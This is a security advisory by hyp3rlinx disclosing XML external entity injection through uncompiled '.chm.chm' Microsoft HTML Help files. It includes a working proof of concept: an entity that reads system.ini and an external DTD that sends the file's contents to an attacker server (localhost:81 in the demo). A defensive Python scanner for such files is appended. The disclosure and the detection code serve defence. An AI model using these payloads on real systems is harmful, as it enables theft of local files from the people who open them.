- Microsoft Security Advisory (2588513) (Microsoft)
- Microsoft Security Bulletin MS12-006 (Microsoft)
- Multiple vulnerabilities have been found in Cosminexus. (Hitachi)
- Oracle Critical Patch Update Advisory - January 2015 Oracle Advisory (Oracle)
- Oracle Critical Patch Update Advisory - October 2013 (Oracle)
- Oracle Java SE Critical Patch Update Advisory - October 2011 (Oracle)
- Potential Security Vulnerabilities in Oracle Java 5 SDK affecting IBM WebSphere (IBM)
- Security Bulletin: IBM System x and Flex Systems Browser Exploit Against SSL/TLS (IBM)
- Security Bulletin: Potential Security Vulnerabilities in Oracle Java 5 SDK affec (IBM)
- Security Bulletin: Power System Firmware affected by vulnerability in OpenSSL (C (IBM)
- Security Bulletin: Vulnerabilities in AppScan Enterprise and Policy Tester (IBM)
- Security Bulletin: Vulnerabilities in AppScan Standard (IBM)
- Security Bulletin: Vulnerability in Transport Layer Security Protocol Used in IB (IBM)
- SSA-556833: TLS Vulnerabilities in SIMATIC RF6XXR (Siemens)
- VMSA-2012-0003 VMware VirtualCenter Update and ESX 3.5 patch update JRE (VMware)
- VMSA-2012-0005 VMware vCenter Server, Orchestrator, Update Manager, vShield, vSp (VMware)
- Vulnerability about TLS Protocol in Cosminexus HTTP Server and Hitachi Web Serve (Hitachi)
- Vulnerability Note VU#864643 SSL 3.0 and TLS 1.0 allow chosen plaintext attack i (US-CERT)
- Xerox Security Bulletin XRX13-007 (Xerox)
Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity Injection
Microsoft compiled HTML Help and uncompiled .chm files can be leveraged for XML external entity injection attacks.
58644216083e140438ff9e4523e0bb5b
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Compiled HTML Help "hh.exe"
Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
CHM files are usually created using Microsoft's "HTML Help Workshop" program. However, I found a way to bypass using this program and create them easily by
simply adding a double .chm extension to the file (".chm.chm"). Compiled HTML Help "hh.exe" will then respect and open it, processing any JS/HTML/XML inside.
Compiled HTML Help is also vulnerable to XML External Entity attacks, allowing remote attackers to steal and exfiltrate local system files.
What's interesting about this one is that we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhctrl.ocx" ActiveX control (CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436) or other code execution methods.
While CHM is already considered a "dangerous" file type and other types of attacks have already been documented, I thought this was an interesting way to
create CHM files "Uncompiled", bypassing the default creation steps while stealing local files in the process.
Note: User interaction is required to exploit this vulnerability.
[Exploit/POC]
1) python -m SimpleHTTPServer
2) "XXE.chm.chm"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>
3) "payload.dtd" (hosted in python web-server dir port 81 above)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;
Opening the "XXE.chm.chm" file will exfiltrate the Windows "system.ini" file; the attacker server IP is set to localhost on port 81 for the PoC.
Tested successfully on Windows 7/10.
[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
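A defensive triage check for the behaviour described in the advisory above, as an added example that is not part of the original advisory: it flags files that carry a .chm extension but lack the "ITSF" signature of a compiled CHM container, and raises the verdict when the plain-text content declares an external XML entity. The function names, verdict labels and sample files are assumptions constructed for this example.

```python
import re
import tempfile
from pathlib import Path

ITSF_MAGIC = b"ITSF"  # first four bytes of a genuinely compiled CHM container
# <!ENTITY [%] name SYSTEM|PUBLIC ...> : an external (general or parameter) entity
EXTERNAL_ENTITY = re.compile(rb"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I)
MARKUP_HINT = re.compile(rb"<!DOCTYPE|<html|<\?xml|<script", re.I)

def classify_chm(path, max_bytes=1 << 20):
    """Return (verdict, reasons) for one file that carries a .chm extension."""
    p = Path(path)
    with p.open("rb") as fh:
        data = fh.read(max_bytes)
    if data.startswith(ITSF_MAGIC):
        return "compiled", []
    reasons = ["no ITSF signature, so this is not a compiled CHM"]
    if p.name.lower().endswith(".chm.chm"):
        reasons.append("double .chm extension")
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):  # UTF-16 text: normalise before matching
        data = data.decode("utf-16", errors="replace").encode("utf-8")
    if MARKUP_HINT.search(data):
        reasons.append("contains plain HTML/XML markup")
    if EXTERNAL_ENTITY.search(data):
        reasons.append("declares an external entity (SYSTEM/PUBLIC)")
        return "suspicious-xxe", reasons
    return "uncompiled", reasons

def scan(directory):
    """Map each *.chm file under directory (any letter case) to its verdict."""
    files = (f for f in Path(directory).rglob("*")
             if f.is_file() and f.suffix.lower() == ".chm")
    return {f.name: classify_chm(f)[0] for f in files}

def demo():
    """Classify three constructed sample files written to a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "manual.chm").write_bytes(ITSF_MAGIC + b"\x00" * 92)
        (root / "notes.chm.chm").write_bytes(b"<html><body>release notes</body></html>")
        (root / "XXE.chm.chm").write_bytes(
            b'<xml><!DOCTYPE t [<!ENTITY % dtd SYSTEM "http://example.invalid/p.dtd">'
            b" %dtd;]><t/></xml>")
        return scan(root)

if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{verdict:15} {name}")
```

Pointing `scan()` at mail-gateway quarantine or download directories gives a quick list of .chm files that hh.exe would render as raw markup; anything marked "uncompiled" still deserves review, since the advisory notes that embedded JS/HTML is processed as well.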